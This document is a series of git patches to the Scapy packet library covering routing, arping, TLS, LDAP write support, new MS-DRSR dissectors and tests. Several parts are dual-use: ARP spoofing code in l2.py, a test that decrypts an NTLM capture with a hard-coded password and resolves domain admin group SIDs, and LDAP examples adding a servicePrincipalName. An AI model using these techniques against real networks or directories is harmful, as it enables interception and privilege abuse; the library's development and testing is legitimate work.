Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sun, 6 Oct 2024 23:36:15 +0200 Subject: [PATCH 1378/1632] Work around GH#4541 (#4560) --- scapy/arch/linux/rtnetlink.py | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/scapy/arch/linux/rtnetlink.py b/scapy/arch/linux/rtnetlink.py index a5e18bdb698..e57d2459c8c 100644 --- a/scapy/arch/linux/rtnetlink.py +++ b/scapy/arch/linux/rtnetlink.py @@ -887,6 +887,9 @@ def read_routes(): ifaces = _get_if_list() results = _read_routes(socket.AF_INET) for msg in results: + # Omit stupid answers (some OS conf appears to lead to this) + if msg.rtm_family != socket.AF_INET: + continue # Process the RTM_NEWROUTE net = 0 mask = itom(msg.rtm_dst_len) @@ -937,6 +940,9 @@ def read_routes6(): results = _read_routes(socket.AF_INET6) lifaddr = _get_ips(af_family=socket.AF_INET6) for msg in results: + # Omit stupid answers (some OS conf appears to lead to this) + if msg.rtm_family != socket.AF_INET6: + continue # Process the RTM_NEWROUTE prefix = "::" plen = msg.rtm_dst_len From 6f0faf38597080daca367d741903a99464e32760 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Tue, 8 Oct 2024 21:28:06 +0200 Subject: [PATCH 1379/1632] Fix GH4550 (#4561) --- scapy/volatile.py | 1 + 1 file changed, 1 insertion(+) diff --git a/scapy/volatile.py b/scapy/volatile.py index b60e1a018a7..1500840c909 100644 --- a/scapy/volatile.py +++ b/scapy/volatile.py @@ -577,6 +577,7 @@ def __init__(self, size, term): # type: (Union[int, RandNum], bytes) -> None self.term = bytes_encode(term) super(RandTermString, self).__init__(size=size) + self.chars = self.chars.replace(self.term, b"") def _command_args(self): # type: () -> str From 014a86a8292afb2140c38c6e6b20c23804f10e7b Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 14 Oct 2024 21:01:07 +0200 Subject: [PATCH 1380/1632] Fix arping() without route (#4567) --- scapy/layers/l2.py | 32 +++++++++++++++++++++++++++----- 1 file changed, 27 insertions(+), 5 deletions(-) diff --git a/scapy/layers/l2.py b/scapy/layers/l2.py index 8ec52cf446b..1c46b246c00 100644 --- a/scapy/layers/l2.py +++ b/scapy/layers/l2.py @@ -21,7 +21,11 @@ from scapy.data import ARPHDR_ETHER, ARPHDR_LOOPBACK, ARPHDR_METRICOM, \ DLT_ETHERNET_MPACKET, DLT_LINUX_IRDA, DLT_LINUX_SLL, DLT_LINUX_SLL2, \ DLT_LOOP, DLT_NULL, ETHER_ANY, ETHER_BROADCAST, ETHER_TYPES, ETH_P_ARP, ETH_P_MACSEC -from scapy.error import warning, ScapyNoDstMacException, log_runtime +from scapy.error import ( + ScapyNoDstMacException, + log_runtime, + warning, +) from scapy.fields import ( BCDFloatField, BitField, @@ -938,7 +942,7 @@ def _tups(ip, mac): # ip can be a Net/list/etc and will be iterated upon while sending return [(ip, "ff:ff:ff:ff:ff:ff")] return [(x.query.pdst, x.answer.hwsrc) - for x in arping(ip, verbose=0)[0]] + for x in arping(ip, verbose=0, iface=iface)[0]] elif isinstance(mac, list): return [(ip, x) for x in mac] else: @@ -960,6 +964,7 @@ def _tups(ip, mac): (x for ipa, maca in tup1 for ipb, _ in tup2 + if ipb != ipa for x in Ether(dst=maca, src=target_mac) / ARP(op="who-has", psrc=ipb, pdst=ipa, @@ -968,6 +973,7 @@ def _tups(ip, mac): (x for ipb, macb in tup2 for ipa, _ in tup1 + if ipb != ipa for x in Ether(dst=macb, src=target_mac) / ARP(op="who-has", psrc=ipa, pdst=ipb, @@ -987,6 +993,7 @@ def _tups(ip, mac): (x for ipa, maca in tup1 for ipb, macb in tup2 + if ipb != ipa for x in Ether(dst="ff:ff:ff:ff:ff:ff", src=macb) / ARP(op="who-has", psrc=ipb, pdst=ipa, @@ -995,6 +1002,7 @@ def _tups(ip, mac): (x for ipb, macb in tup2 for ipa, maca in tup1 + if ipb != ipa for x in Ether(dst="ff:ff:ff:ff:ff:ff", src=maca) / ARP(op="who-has", psrc=ipa, pdst=ipb, @@ -1055,19 +1063,33 @@ def arping(net: str, hwaddr = None if "iface" in kargs: hwaddr = get_if_hwaddr(kargs["iface"]) - r = conf.route.route(str(net), verbose=False) + if isinstance(net, list): + hint = net[0] + else: + hint = str(net) + psrc = conf.route.route(hint, verbose=False)[1] + if psrc == "0.0.0.0": + if "iface" in kargs: + psrc = get_if_addr(kargs["iface"]) + else: + warning( + "No route found for IPv4 destination %s. " + "Using conf.iface. Please provide an 'iface' !" % hint) + psrc = get_if_addr(conf.iface) + hwaddr = get_if_hwaddr(conf.iface) + kargs["iface"] = conf.iface ans, unans = srp( Ether(dst="ff:ff:ff:ff:ff:ff", src=hwaddr) / ARP( pdst=net, - psrc=r[1], + psrc=psrc, hwsrc=hwaddr ), verbose=verbose, filter="arp and arp[7] = 2", timeout=timeout, threaded=threaded, - iface_hint=net, + iface_hint=hint, **kargs, ) ans = ARPingResult(ans.res) From b9aebbef8f777ce815e865d7215468c9f585166c Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 14 Oct 2024 21:04:42 +0200 Subject: [PATCH 1381/1632] Chown when Scapy is run with sudo (#4566) --- scapy/main.py | 31 ++++++++++++++++++++++++++++++- 1 file changed, 30 insertions(+), 1 deletion(-) diff --git a/scapy/main.py b/scapy/main.py index 89af5906635..7427b3fdf7e 100644 --- a/scapy/main.py +++ b/scapy/main.py @@ -129,9 +129,38 @@ def _read_config_file(cf, _globals=globals(), _locals=locals(), return # We have a default ! set it try: - cf_path.parent.mkdir(parents=True, exist_ok=True) + if not cf_path.parent.exists(): + cf_path.parent.mkdir(parents=True, exist_ok=True) + if ( + not WINDOWS and + "SUDO_UID" in os.environ and + "SUDO_GID" in os.environ + ): + # Was started with sudo. Still, chown to the user. + try: + os.chown( + cf_path.parent, + int(os.environ["SUDO_UID"]), + int(os.environ["SUDO_GID"]), + ) + except Exception: + pass with cf_path.open("w") as fd: fd.write(default) + if ( + not WINDOWS and + "SUDO_UID" in os.environ and + "SUDO_GID" in os.environ + ): + # Was started with sudo. Still, chown to the user. + try: + os.chown( + cf_path, + int(os.environ["SUDO_UID"]), + int(os.environ["SUDO_GID"]), + ) + except Exception: + pass log_loading.debug("Config file [%s] created with default.", cf) except OSError: log_loading.warning("Config file [%s] could not be created.", cf, From 4a66706fbbbe069608cb2bf2326c38e57a5db20b Mon Sep 17 00:00:00 2001 From: Arjun <150156386+arjunbhat1@users.noreply.github.com> Date: Mon, 14 Oct 2024 21:33:55 +0200 Subject: [PATCH 1382/1632] Fix corruption of certain packets containing invalid TLS extension fields (#4554) * Fix corruption of certain packets with invalid TLS extension fields * Use idioms --------- Co-authored-by: gpotter2 <10530980+gpotter2@users.noreply.github.com> --- scapy/layers/tls/extensions.py | 2 ++ test/scapy/layers/tls/tls.uts | 5 +++++ 2 files changed, 7 insertions(+) diff --git a/scapy/layers/tls/extensions.py b/scapy/layers/tls/extensions.py index 87ffe67219c..42dfa6f6048 100644 --- a/scapy/layers/tls/extensions.py +++ b/scapy/layers/tls/extensions.py @@ -843,4 +843,6 @@ def m2i(self, pkt, m): cls = _tls_ext_early_data_cls.get(pkt.msgtype, TLS_Ext_Unknown) res.append(cls(m[:tmp_len + 4], tls_session=pkt.tls_session)) m = m[tmp_len + 4:] + if m: + res.append(conf.raw_layer(m)) return res diff --git a/test/scapy/layers/tls/tls.uts b/test/scapy/layers/tls/tls.uts index 95a7c34a348..a240a4f05f9 100644 --- a/test/scapy/layers/tls/tls.uts +++ b/test/scapy/layers/tls/tls.uts @@ -1561,6 +1561,11 @@ data = '1603031616020000660303602161b58e22f4966f18f9aa6afd5759f343935ed437cf09c5 pkt = TLS(bytes.fromhex(data)) assert [type(x) for x in pkt.msg] == [TLSServerHello, TLSCertificate, TLSCertificateStatus, TLSServerKeyExchange, TLSServerHelloDone] += Issue 3853 +data = hex_bytes("16030300360200002e030342615f0b32366c85b5de265ec99fd68c59079d9783dc2f547592fe12f4ab3fde00c02c000015ff01000100000e000000") +tls_packet = TLS(data) +assert raw(tls_packet) == data + ############################################################################### ############################ Automaton behaviour ############################## ############################################################################### From 1efdc1ea474c39b48d2972539ea70327e335e466 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 14 Oct 2024 21:35:49 +0200 Subject: [PATCH 1383/1632] Fix LDAP test crash (#4568) --- scapy/layers/ldap.py | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/scapy/layers/ldap.py b/scapy/layers/ldap.py index fb29c5493d5..803dc8165f8 100644 --- a/scapy/layers/ldap.py +++ b/scapy/layers/ldap.py @@ -963,7 +963,14 @@ def tcp_reassemble(cls, data, *args, **kwargs): if length and len(x) >= length: remaining = x[length:] if not remaining: - return cls(data) + pkt = cls(data) + # Packet can be a whole response yet still miss some content. + if ( + LDAP_SearchResponseEntry in pkt and + LDAP_SearchResponseResultDone not in pkt + ): + return None + return pkt else: return None return None From 38150fe632420dd2a3cb98447989648513a5ae54 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 14 Oct 2024 22:04:48 +0200 Subject: [PATCH 1384/1632] Restore scapy.1 installation (#4569) --- setup.py | 1 + 1 file changed, 1 insertion(+) diff --git a/setup.py b/setup.py index 9869dc1ce9d..b1c21b579bb 100755 --- a/setup.py +++ b/setup.py @@ -83,6 +83,7 @@ def build_package_data(self): setup( cmdclass={'sdist': SDist, 'build_py': BuildPy}, + data_files=[('share/man/man1', ["doc/scapy.1"])], long_description=get_long_description(), long_description_content_type='text/markdown', ) From b2f6dec77d077908dbc1a7ad84d3a80f01f9b4f6 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Wed, 16 Oct 2024 00:33:17 +0200 Subject: [PATCH 1385/1632] Include .1 in zipapp (#4570) --- .config/ci/zipapp.sh | 1 + 1 file changed, 1 insertion(+) diff --git a/.config/ci/zipapp.sh b/.config/ci/zipapp.sh index e7f28e3f421..42e9f566474 100755 --- a/.config/ci/zipapp.sh +++ b/.config/ci/zipapp.sh @@ -56,6 +56,7 @@ echo "> Stripping down..." cd "$SCPY" && find . -not \( \ -wholename "./scapy*" -o \ -wholename "./pyproject.toml" -o \ + -wholename "./doc/scapy.1" -o \ -wholename "./setup.py" -o \ -wholename "./README.md" -o \ -wholename "./LICENSE" \ From 28287eb5c74cd31959660f9df827dc2c8072236a Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Thu, 17 Oct 2024 08:47:31 +0200 Subject: [PATCH 1386/1632] Try cache mkdir in XDG handling --- scapy/main.py | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/scapy/main.py b/scapy/main.py index 7427b3fdf7e..c5ad0c74d99 100644 --- a/scapy/main.py +++ b/scapy/main.py @@ -73,7 +73,12 @@ def _probe_xdg_folder(var, default, *cf): # https://specifications.freedesktop.org/basedir-spec/basedir-spec-latest.html # "If, when attempting to write a file, the destination directory is # non-existent an attempt should be made to create it with permission 0700." - path.mkdir(mode=0o700, exist_ok=True) + try: + path.mkdir(mode=0o700, exist_ok=True) + except Exception: + # There is a gazillion ways this can fail. Most notably, + # a read-only fs. + return None return path.joinpath(*cf).resolve() From a9eed2d0e5bac899a86c059eb0736ca457bb11f5 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 21 Oct 2024 17:42:09 +0200 Subject: [PATCH 1387/1632] Add some [MS-DRSR] parts (#4572) --- scapy/layers/msrpce/all.py | 1 + scapy/layers/msrpce/msdrsr.py | 83 +++++++ scapy/layers/msrpce/raw/ms_drsr.py | 209 ++++++++++++++++++ test/pcaps/dcerpc_msdrsr_cracknames.pcapng.gz | Bin 0 -> 3552 bytes test/scapy/layers/msdrsr.uts | 87 ++++++++ 5 files changed, 380 insertions(+) create mode 100644 scapy/layers/msrpce/msdrsr.py create mode 100644 scapy/layers/msrpce/raw/ms_drsr.py create mode 100644 test/pcaps/dcerpc_msdrsr_cracknames.pcapng.gz create mode 100644 test/scapy/layers/msdrsr.uts diff --git a/scapy/layers/msrpce/all.py b/scapy/layers/msrpce/all.py index a67eeb26439..89e2baa0e85 100644 --- a/scapy/layers/msrpce/all.py +++ b/scapy/layers/msrpce/all.py @@ -32,6 +32,7 @@ # Low-level RPC definitions "msrpce.raw.ept", "msrpce.raw.ms_dcom", + "msrpce.raw.ms_drsr", "msrpce.raw.ms_nrpc", "msrpce.raw.ms_samr", "msrpce.raw.ms_srvs", diff --git a/scapy/layers/msrpce/msdrsr.py b/scapy/layers/msrpce/msdrsr.py new file mode 100644 index 00000000000..31ab4f0e1bb --- /dev/null +++ b/scapy/layers/msrpce/msdrsr.py @@ -0,0 +1,83 @@ +# SPDX-License-Identifier: GPL-2.0-or-later +# This file is part of Scapy +# See https://scapy.net/ for more information +# Copyright (C) Gabriel Potter + +""" +[MS-DRSR] Directory Replication Service (DRS) Remote Protocol +""" + +import uuid +from scapy.packet import Packet +from scapy.fields import LEIntField, FlagsField, UUIDField, UTCTimeField + +from scapy.layers.msrpce.raw.ms_drsr import UUID +from scapy.layers.msrpce.raw.ms_drsr import * # noqa: F403,F401 + +# [MS-DRSR] sect 5.39 DRS_EXTENSIONS_INT + + +class DRS_EXTENSIONS_INT(Packet): + fields_desc = [ + FlagsField( + "dwFlags", + 0, + -32, + { + 0x00000001: "BASE", + 0x00000002: "ASYNCREPL", + 0x00000004: "REMOVEAPI", + 0x00000008: "MOVEREQ_V2", + 0x00000010: "GETCHG_DEFLATE", + 0x00000020: "DCINFO_V1", + 0x00000040: "RESTORE_USN_OPTIMIZATION", + 0x00000080: "ADDENTRY", + 0x00000100: "KCC_EXECUTE", + 0x00000200: "ADDENTRY_V2", + 0x00000400: "LINKED_VALUE_REPLICATION", + 0x00000800: "DCINFO_V2", + 0x00001000: "INSTANCE_TYPE_NOT_REQ_ON_MOD", + 0x00002000: "CRYPTO_BIND", + 0x00004000: "GET_REPL_INFO", + 0x00008000: "STRONG_ENCRYPTION", + 0x00010000: "DCINFO_VFFFFFFFF", + 0x00020000: "TRANSITIVE_MEMBERSHIP", + 0x00040000: "ADD_SID_HISTORY", + 0x00080000: "POST_BETA3", + 0x00100000: "GETCHGREQ_V5", + 0x00200000: "GETMEMBERSHIPS2", + 0x00400000: "GETCHGREQ_V6", + 0x00800000: "NONDOMAIN_NCS", + 0x01000000: "GETCHGREQ_V8", + 0x02000000: "GETCHGREPLY_V5", + 0x04000000: "GETCHGREPLY_V6", + 0x08000000: "WHISTLER_BETA3", + 0x10000000: "W2K3_DEFLATE", + 0x20000000: "GETCHGREQ_V10", + 0x40000000: "R2", + 0x80000000: "R3", + }, + ), + UUIDField("SiteObjGuid", None, uuid_fmt=UUIDField.FORMAT_LE), + LEIntField("Pid", 0), + UTCTimeField("dwReplEpoch", None, fmt="a{JD8lzVgSYs4`+fg?=lPv^&N=g(>ps_gU(Y?~3vjcsc{2>2V207bD9GXD^$mP5Ql4b0BgWKpmy(=< zGyp7M6)+~Bboat2%VFi@w<_SaT07e*E1|$Hu+!by)z;b-BXy8WA-OqPQ=FtRN^lgz+IeUkH4Ni9j4!z=Lrce!*q;H$vn< z?VR7?CQI}&aV>v~D+1wW1HcM6+4!K@UOI4LH#AtJ-_Oc#o+mfjJ)+c&-;LD;&UjH+18j=fR8x z;wPUwGy-BL)Q9WxSRj-c3UDkgQJ2Ny3vtCWJ%R{kRS+KL!^PyogQ#2J(;&2g54NPF zs;q)r;Pt<8Kr+?D1ymNepu$-k-mcXRS>zH5T|1eaY2TGT=Q#JyV2jl@8GxGu*<3P|+BxX}Z@ z#T7w}2d{@?$HxN4?gOG8fn3zfvY49hbIvWf?JG=7g4KYYim;nJof+B2%4Eg0W=~HT}z8fnB+v57*Z2e z)c2Lo_&xbtXp!ixzlXj&BbKN2oips=0DS-DwH45qBV-Bo*tUgL!sTRvQl#4!t&#US zF~j=~4tc=3S+2{9ODZhC=yGWumSQL}^Kih@cV7|^SGd&>T>WGT&=GvEKi{J zli%sRL}GxcckQLRd?CN6%fM<_mw>6uD2N>#&I1eRoOIG8a`5Pd3(wM?%MoSg)H1lY zgvN&7FPAAl`>DA9(|3jE`=>{#O$GKZIg37T@QdlZ$&>lCDeFzQnmJz%G5JSxpkVFe zxNmGSk_v>(=b9tiHA5nzc;tshxj0@|(YZO$TueK#&C$xq<6@?QKJ%6bf5S67QtMZq zOZ`{EP-5oJ&%g0s1(Z7l=6NEQ@LY_JrNQ69)mmNyWqp~lz4niv&fPL(r3;oRvyEPw z`>bSLKsQoAwhdk=Qxo-mzopVOQdC`&Q=q-lHt%$>N=5GNWQR?*h-(xa&yfC~@yvrhVfCMelM3`MmS3#9Cp7)}+63t>Vc+2GhXPpxb-$0f#4j^E53^>|U%VVkh+mcKmhorzP1 zsF<6Jc&|mc3t#p-{K}dpjp1o$TKnx!`USYGA3|ZNNw0d2$vdxp?AxT=Gxod@s~8Y< z>)lDl2!&P~*-JN@4GoB{$`Qx6S(oghCl*({ZvSL!$jefHq?SmuN@Q*LmS|CPz`9?* zWVcaIJ!Z<^Gt<%wb0Mn#A<>LF@!Gyzi(KD45?@{sbceMO zV{AfD?B)5zb!>bFasqeDJ0Yw0wnvY5Y&w7DyNsih>*MSBCqu8db`L>W`6??zBN88t zD@H!Lu_G~XFt7Fjr72-!O}eL;nMDksjWe z-K`IogaBkDmhtQSTp@bPae}^*eq( z>La+D1EiKkB9nIBMaZMy-llVhN^TzM`8deG^Q>3ltC|e`K;Ha>+?h3gUqZ}XRO_*k zLR{SMhc`5ef5YypBBw0z4lPq(HH$rhb??+9pl44HIB_*zEa#wSR zlh{Y}$Bt8xzV!Az&n!s(`3}~ee!a2>9eJYH9QI(FnI833*gkRJP>RyEkyA9F)y$Lw zjru1Ktj&_3zaP-sJpc0vzyEL^aQr0?5WEyndQcy(%kv#dg@J?fU6jkRd>2Jr(dY{A z6+?IZ%y)dK`8?3gGLKFe%g5B*zV0ivzWkk%@7F@faBs)&jFIUTZQqsFC!A8VyYl!T zUju`;yZy-N*>i#;7x#Q~tttMYgo$!l70YWCFJK~@D&R1CG@>Zq_hB=msw+29VMG3! zO3O~8x$cLOl*8kEV^u-2J4h%s)P6y<`@z6dM2T`sT#vkaZok)wVbsWT74>WM>v1k9TFn8G9@a}t}1PE_hZ#y{{B91{WVU8c@OogYxy3P z#$F65Ust;^XX@7J)??Cp*0MEj)Qh8MsRWZ7c?M3Tsf-JCOf-e>xK+&?f}}}@V0Z-$ z^QgFzzuHPeSs$iPZdGi&k#caKsBYoku;e@6n#3L z7w4OyofIZ(X4yJxQ{KJR&n^4faZ*Mit~g7ke^%(4RzX`*JjdN$@kC*dxA?^yxH_gx1wrvLj=thE7TZ#HMTA5q*-3E<}_mm=YiC&H~I#A zLbd5)bduR7n{IISrLk~v%fqfWG~Lz>pjhW+rE7w|NWu}-RTB{!_xEWC%UrxR760zE zV%WO3{l_k6itU|r>BO#&oHSTvTbY;Qh7?_$Q7la9lQ3xyVVuu!6^}1g;Sgo{KHjWI ze2&L&d4J+wk7XynvDu6Kp!TG1R-qd15ubH*H3LYDc$=%=zwW5(xlb*hb7Dmb>fDux z8Qp>}qI)Ntb8Eam7T=Q6`oel9*5|M#k2V#LCQOm0%i0up^|;gRy`E6j!+m^zJn`;x zcY4t7bfk!8A(>gq&!QD(ab3{~jF?*dXsK5BXxQWsbM&UuOq#{&E0XGye?>*fmQFS_ zuhuu*f4ejF+>M%Xiht%+l5DEgO;5D0KAY;4m|EzJ$#rvqy1N|dCx!S5V*Iuvb{WQK z=@y<4m~!4fnHG!l;pV^LQy(`3LrQMDb6R|EaQM8yD)|dF1_zC3VnF7u&f>(v^JUH69dp^%N zqW*hdiauD2`ono?khy<+v2?%D=sH*-olM|geqQ<&H_-eU>JR%}W#)eO%+mZNoeW{0 zg7&+s{v9{}^&fG!GjaWXi_8Bf+`a3b|G^K?SrGC=NzpPtoPw}#z~@H$xkX%P_XV9o z=F6xA8eC}jaS#F40=$d+Nh*orhH<61c#!Q#b{HFPjNSYnNJ!{}0zaGn%E*jmp^bv( ap`iBe1uRy;4t_1LjsE}v$ZT)$5&!@y+Z literal 0 HcmV?d00001 diff --git a/test/scapy/layers/msdrsr.uts b/test/scapy/layers/msdrsr.uts new file mode 100644 index 00000000000..87861bc9d1f --- /dev/null +++ b/test/scapy/layers/msdrsr.uts @@ -0,0 +1,87 @@ +% MS-DRSR tests + ++ [MS-DRSR] test vectors + ++ Dissect DRSR Crack_Names exchange + += [EXCH] - Load MSDRSR exchange and decrypt (SPNEGOSSP/NTLMSSP) + +load_layer("msrpce") +bind_layers(TCP, DceRpc5, sport=49685) # the DCE/RPC port +bind_layers(TCP, DceRpc5, dport=49685) + +conf.dcerpc_session_enable = True +conf.winssps_passive = [ + SPNEGOSSP( + [ + NTLMSSP( + IDENTITIES={ + "Administrator": MD4le("Password123!"), + }, + ) + ] + ) +] +pkts = sniff(offline=scapy_path('test/pcaps/dcerpc_msdrsr_cracknames.pcapng.gz'), session=TCPSession) +conf.dcerpc_session_enable = False + += [EXCH] - Check IDL_DRSBind_Request + +from scapy.layers.msrpce.msdrsr import DRS_EXTENSIONS_INT + +bindreq = pkts[7] +assert IDL_DRSBind_Request in bindreq +ext = DRS_EXTENSIONS_INT(bindreq[IDL_DRSBind_Request].valueof("pextClient").rgb) +assert ext.Pid == 1234 +assert ext.dwReplEpoch == 1729468809 + += [EXCH] - Check IDL_DRSBind_Response + +import uuid + +bindresp = pkts[8] +assert IDL_DRSBind_Response in bindresp +assert bindresp[IDL_DRSBind_Response].phDrs.uuid == b'\xf4$I\xf5\xde\x0c\xfcO\x8b\xfa\xb0Y\x87\xf4\x11i' +ext = DRS_EXTENSIONS_INT(bindresp[IDL_DRSBind_Response].valueof("ppextServer").rgb) +assert ext.dwFlags.GETCHGREQ_V10 +assert ext.dwFlags == 0x3fffff7f +assert ext.Pid == 696 +assert ext.ConfigObjGuid == uuid.UUID('14ea64e0-3470-48e6-9ace-77012d8d474f') + += [EXCH] - Check IDL_DRSCrackNames_Request + +cnreq = pkts[9] +assert IDL_DRSCrackNames_Request in cnreq + +crackreq = cnreq[IDL_DRSCrackNames_Request].valueof("pmsgIn") +assert crackreq.formatOffered == 11 +assert crackreq.formatDesired == 0xfffffff2 + +assert crackreq.valueof("rpNames") == [ + b'S-1-5-21-1924137214-3718646274-40215721-522', + b'S-1-5-21-1924137214-3718646274-40215721-498', + b'S-1-5-21-1924137214-3718646274-40215721-516', + b'S-1-5-21-1924137214-3718646274-40215721-526', + b'S-1-5-21-1924137214-3718646274-40215721-527', + b'S-1-5-21-1924137214-3718646274-40215721-512', + b'S-1-5-21-1924137214-3718646274-40215721-519', + b'S-1-5-21-1924137214-3718646274-40215721-513', +] + += [EXCH] - Check IDL_DRSCrackNames_Response + +cnresp = pkts[10] +assert IDL_DRSCrackNames_Response in cnresp + +crackresp = cnresp[IDL_DRSCrackNames_Response].valueof("pmsgOut") +assert [x.valueof("pName") for x in crackresp.valueof("pResult").valueof("rItems")] == [ + b'Cloneable Domain Controllers@DOMAIN', + b'Enterprise Read-only Domain Controllers@DOMAIN', + b'Domain Controllers@DOMAIN', + b'Key Admins@DOMAIN', + b'Enterprise Key Admins@DOMAIN', + b'Domain Admins@DOMAIN', + b'Enterprise Admins@DOMAIN', + b'Domain Users@DOMAIN', +] + From 206f1beea0c57d2369030426e0ff38623655d9d5 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Sun, 3 Nov 2024 18:30:04 +0100 Subject: [PATCH 1388/1632] Add EOF condition to HTTP_Server state SERVE (#4577) --- scapy/layers/http.py | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/scapy/layers/http.py b/scapy/layers/http.py index c0eb9aa23c5..394d220e4fd 100644 --- a/scapy/layers/http.py +++ b/scapy/layers/http.py @@ -1173,6 +1173,10 @@ def SERVE(self, pkt=None): else: self.vprint("%s" % pkt.summary()) + @ATMT.eof(SERVE) + def serve_eof(self): + raise self.CLOSED() + @ATMT.receive_condition(SERVE) def new_request(self, pkt): raise self.SERVE(pkt) From 8e08cbf759de6709a5b4af6bea3655d293129bb4 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Tue, 5 Nov 2024 09:33:14 +0100 Subject: [PATCH 1389/1632] LDAP: add modify/add/delete (#4580) --- doc/scapy/layers/ldap.rst | 48 +++++++++-- scapy/layers/ldap.py | 166 ++++++++++++++++++++++++++++++++----- test/scapy/layers/ldap.uts | 2 +- 3 files changed, 186 insertions(+), 30 deletions(-) diff --git a/doc/scapy/layers/ldap.rst b/doc/scapy/layers/ldap.rst index 73de23432a5..89c4adc62c9 100644 --- a/doc/scapy/layers/ldap.rst +++ b/doc/scapy/layers/ldap.rst @@ -3,9 +3,6 @@ LDAP Scapy fully implements the LDAPv2 / LDAPv3 messages, in addition to a very basic :class:`~scapy.layers.ldap.LDAP_Client` class. -.. warning:: - Scapy's LDAP client is currently read-only. PRs are welcome ! - LDAP client usage ----------------- @@ -16,6 +13,7 @@ The general idea when using the :class:`~scapy.layers.ldap.LDAP_Client` class co - calling :func:`~scapy.layers.ldap.LDAP_Client.connect` with the IP (this is where to specify whether to use SSL or not) - calling :func:`~scapy.layers.ldap.LDAP_Client.bind` (this is where to specify a SSP if authentication is desired) - calling :func:`~scapy.layers.ldap.LDAP_Client.search` to search data. +- calling :func:`~scapy.layers.ldap.LDAP_Client.modify` to edit data attributes. The simplest, unauthenticated demo of the client would be something like: @@ -36,20 +34,20 @@ The simplest, unauthenticated demo of the client would be something like: |###[ LDAP_SearchResponseEntry ]### | objectName= | \attributes\ - | |###[ LDAP_SearchResponseEntryAttribute ]### + | |###[ LDAP_PartialAttribute ]### | | type = | | \values \ - | | |###[ LDAP_SearchResponseEntryAttributeValue ]### + | | |###[ LDAP_AttributeValue ]### | | | value = - | |###[ LDAP_SearchResponseEntryAttribute ]### + | |###[ LDAP_PartialAttribute ]### | | type = | | \values \ - | | |###[ LDAP_SearchResponseEntryAttributeValue ]### + | | |###[ LDAP_AttributeValue ]### | | | value = - | |###[ LDAP_SearchResponseEntryAttribute ]### + | |###[ LDAP_PartialAttribute ]### | | type = | | \values \ - | | |###[ LDAP_SearchResponseEntryAttributeValue ]### + | | |###[ LDAP_AttributeValue ]### | | | value = [...] @@ -222,3 +220,35 @@ To understand exactly what's going on, note that the previous call is exactly id .. warning:: Our RFC2254 parser currently does not support 'Extensible Match'. + +Modifying attributes +~~~~~~~~~~~~~~~~~~~~ + +It's also possible to change some attributes on an object. +The following issues a ``Modify Request`` that replaces the ``displayName`` attribute and adds a ``servicePrincipalName``: + +.. code:: python + + client.modify( + "CN=User1,CN=Users,DC=domain,DC=local", + changes=[ + LDAP_ModifyRequestChange( + operation="replace", + modification=LDAP_PartialAttribute( + type="displayName", + values=[ + LDAP_AttributeValue(value="Lord User the 1st") + ] + ) + ), + LDAP_ModifyRequestChange( + operation="add", + modification=LDAP_PartialAttribute( + type="servicePrincipalName", + values=[ + LDAP_AttributeValue(value="http/lorduser") + ] + ) + ) + ] + ) \ No newline at end of file diff --git a/scapy/layers/ldap.py b/scapy/layers/ldap.py index 803dc8165f8..3ad956e70db 100644 --- a/scapy/layers/ldap.py +++ b/scapy/layers/ldap.py @@ -208,7 +208,7 @@ class ASN1_Class_LDAP(ASN1_Class): # Bind operation -# https://datatracker.ietf.org/doc/html/rfc1777#section-4.1 +# https://datatracker.ietf.org/doc/html/rfc4511#section-4.2 class ASN1_Class_LDAP_Authentication(ASN1_Class): @@ -397,7 +397,7 @@ def serverSaslCredsData(self): # Unbind operation -# https://datatracker.ietf.org/doc/html/rfc1777#section-4.2 +# https://datatracker.ietf.org/doc/html/rfc4511#section-4.3 class LDAP_UnbindRequest(ASN1_Packet): @@ -409,7 +409,7 @@ class LDAP_UnbindRequest(ASN1_Packet): # Search operation -# https://datatracker.ietf.org/doc/html/rfc1777#section-4.3 +# https://datatracker.ietf.org/doc/html/rfc4511#section-4.5 class LDAP_SubstringFilterInitial(ASN1_Packet): @@ -759,16 +759,16 @@ class LDAP_SearchRequest(ASN1_Packet): ) -class LDAP_SearchResponseEntryAttributeValue(ASN1_Packet): +class LDAP_AttributeValue(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER ASN1_root = AttributeValue("value", "") -class LDAP_SearchResponseEntryAttribute(ASN1_Packet): +class LDAP_PartialAttribute(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER ASN1_root = ASN1F_SEQUENCE( AttributeType("type", ""), - ASN1F_SET_OF("values", [], LDAP_SearchResponseEntryAttributeValue), + ASN1F_SET_OF("values", [], LDAP_AttributeValue), ) @@ -778,8 +778,8 @@ class LDAP_SearchResponseEntry(ASN1_Packet): LDAPDN("objectName", ""), ASN1F_SEQUENCE_OF( "attributes", - LDAP_SearchResponseEntryAttribute(), - LDAP_SearchResponseEntryAttribute, + LDAP_PartialAttribute(), + LDAP_PartialAttribute, ), implicit_tag=ASN1_Class_LDAP.SearchResultEntry, ) @@ -793,14 +793,6 @@ class LDAP_SearchResponseResultDone(ASN1_Packet): ) -class LDAP_AbandonRequest(ASN1_Packet): - ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_SEQUENCE( - ASN1F_INTEGER("messageID", 0), - implicit_tag=ASN1_Class_LDAP.AbandonRequest, - ) - - class LDAP_SearchResponseReference(ASN1_Packet): 